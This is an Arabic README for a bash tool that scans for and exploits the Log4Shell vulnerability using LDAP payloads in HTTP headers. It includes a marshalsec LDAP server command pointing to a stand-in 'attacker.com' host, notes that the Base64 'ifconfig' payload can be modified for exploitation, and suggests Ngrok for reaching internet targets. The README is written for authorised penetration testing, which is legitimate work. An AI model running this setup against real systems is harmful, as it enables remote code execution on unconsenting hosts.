Log4Shell-Scanner-Exploit
سكربت bash يتيح تحديد و/أو استغلال ثغرة Log4shell عن بُعد.
تقوم هذه الأداة بإجراء اختبارات مختلفة باستخدام حمولات LDAP ورؤوس X-Api-Version وUser-Agent وX-Forwarded-For.
استخدم هذا السكربت دائمًا بعد الحصول على إذن مسبق من مالك الخدمة/التطبيق الذي يتم تدقيقه.
التبعيات:
- سننشئ خادم LDAP مُعد مسبقًا من GitHub: https://github.com/mbechler/marshalsec
mvn clean package -DskipTests && Java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar
marshalsec.jndi.LDAPRefServer 'http://attacker.com/#exploit'
-
نقوم بتفعيل خادم HTTP
python3 -m http.server 8080
-
يجب تثبيت Java
#sudo apt install default-jre
-
يجب تثبيت Curl
#sudo apt-get install curl
مثال الاستخدام:
أدخل المعاملات التالية:
- قائمة بعناوين URL المراد فحصها
- عنوان IP لخادم LDAP
- منفذ خادم LDAP
- عنوان IP لخادم HTTP
- منفذ خادم HTTP
#مثال فحص تطبيق على شبكة داخلية:
- ./Log4Shell_Scanner.sh <Diccionario_URL> <IP_Servidor_LDAP> <Puerto_Servidor_LDAP> <IP_Servidor_HTTP> <Puerto_Servidor_HTTP>

#مثال فحص تطبيق على الإنترنت:
- ./Log4Shell_Scanner.sh <Diccionario_URL> <IP_Servidor_LDAP> <Puerto_Servidor_LDAP> <IP_Servidor_HTTP> <Puerto_Servidor_HTTP>

توضيحات:
- الحمولة المستخدمة ترسل أمر "ifconfig" إلى الأجهزة التي تم تحديدها على أنها قابلة للاستغلال، وهذه الحمولة مشفرة بصيغة Base64 ويمكن تعديلها لتنفيذ مرحلة الاستغلال في اختبار الاختراق.
- إذا رغبت في استخدام الأداة على خدمات الإنترنت، يمكنك تشغيل خدمة Ngrok تقوم بعمل إعادة توجيه المنافذ إلى المنفذ المحلي لخادم LDAP.
- استخدم هذا السكربت دائمًا بعد الحصول على إذن مسبق من مالك الخدمة/التطبيق الذي تم تحليله.